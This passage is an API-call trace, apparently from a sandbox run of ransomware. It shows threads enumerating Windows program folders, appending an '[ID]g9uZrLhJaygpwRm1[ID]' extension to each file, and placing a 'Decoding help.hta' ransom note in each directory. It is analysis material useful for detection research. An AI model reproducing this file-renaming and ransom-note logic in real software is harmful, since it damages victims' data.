ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb38745bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x19d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-down.png", cAlternateFileName="")) returned 1 [0059.252] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.252] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0059.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0059.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0059.253] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext-down.png") returned 1 [0059.253] lstrlenW (lpString="bNext-down.png") returned 14 [0059.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0059.253] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0059.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext-down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" [0059.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" [0059.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.337] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ebd8c9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ebd8c9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext-hot.png", cAlternateFileName="")) returned 1 [0060.337] lstrcpyW (in: lpString1=0x10d56ab0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.337] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0060.337] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0060.337] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0060.337] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext-hot.png") returned 1 [0060.337] lstrlenW (lpString="bNext-hot.png") returned 13 [0060.337] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.337] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0060.337] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext-hot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" [0060.337] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" [0060.337] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext-hot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.338] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ebd8c9, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ebd8c9, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNext.png", cAlternateFileName="")) returned 1 [0060.338] lstrcpyW (in: lpString1=0x10d56ab0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.338] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0060.338] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0060.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0060.338] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bNext.png") returned 1 [0060.338] lstrlenW (lpString="bNext.png") returned 9 [0060.338] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0060.338] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0060.338] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bNext.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" [0060.338] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" [0060.338] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bnext.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.286] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-disable.png", cAlternateFileName="")) returned 1 [0061.286] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.286] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0061.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0061.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0061.286] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bPrev-disable.png") returned 1 [0061.286] lstrlenW (lpString="bPrev-disable.png") returned 17 [0061.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.286] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0061.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bPrev-disable.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" [0061.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" [0061.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-disable.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.287] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ee3a28, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7ee3a28, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3a174dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x199, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-down.png", cAlternateFileName="")) returned 1 [0061.287] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.287] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0061.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" [0061.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\decoding help.hta")) returned 0x1 [0061.287] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bPrev-down.png") returned 1 [0061.287] lstrlenW (lpString="bPrev-down.png") returned 14 [0061.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0061.287] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned 77 [0061.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\", lpString2="bPrev-down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png" [0061.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png" [0061.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.981] FindNextFileW (in: hFindFile=0x5d8510, lpFindFileData=0x1a21fd30 | out: lpFindFileData=0x1a21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f09b87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f09b87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3aafa5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x23e, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPrev-hot.png", cAlternateFileName="")) returned 1 Thread: id = 699 os_tid = 0xf34 [0054.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*.*", lpFindFileData=0x1a31fd30 | out: lpFindFileData=0x1a31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db3f8 [0061.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.990] FindNextFileW (in: hFindFile=0x5db3f8, lpFindFileData=0x1a31fd30 | out: lpFindFileData=0x1a31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.990] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.990] FindNextFileW (in: hFindFile=0x5db3f8, lpFindFileData=0x1a31fd30 | out: lpFindFileData=0x1a31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239a00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8239a00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xba32, dwReserved0=0x0, dwReserved1=0x0, cFileName="JOURNAL.ELM", cAlternateFileName="")) returned 1 Thread: id = 700 os_tid = 0xf38 [0054.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*", lpFindFileData=0x1a41fd30 | out: lpFindFileData=0x1a41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e36f0 [0058.026] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.026] FindNextFileW (in: hFindFile=0x5e36f0, lpFindFileData=0x1a41fd30 | out: lpFindFileData=0x1a41fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.026] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.026] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.026] FindNextFileW (in: hFindFile=0x5e36f0, lpFindFileData=0x1a41fd30 | out: lpFindFileData=0x1a41fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b50f00, ftCreationTime.dwHighDateTime=0x1c9db1a, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x52b50f00, ftLastWriteTime.dwHighDateTime=0x1c9db1a, nFileSizeHigh=0x0, nFileSizeLow=0x3340, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.027] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*" [0058.027] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*") returned 70 [0058.027] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\Decoding help.hta" [0058.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\decoding help.hta")) returned 0xffffffff [0058.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common 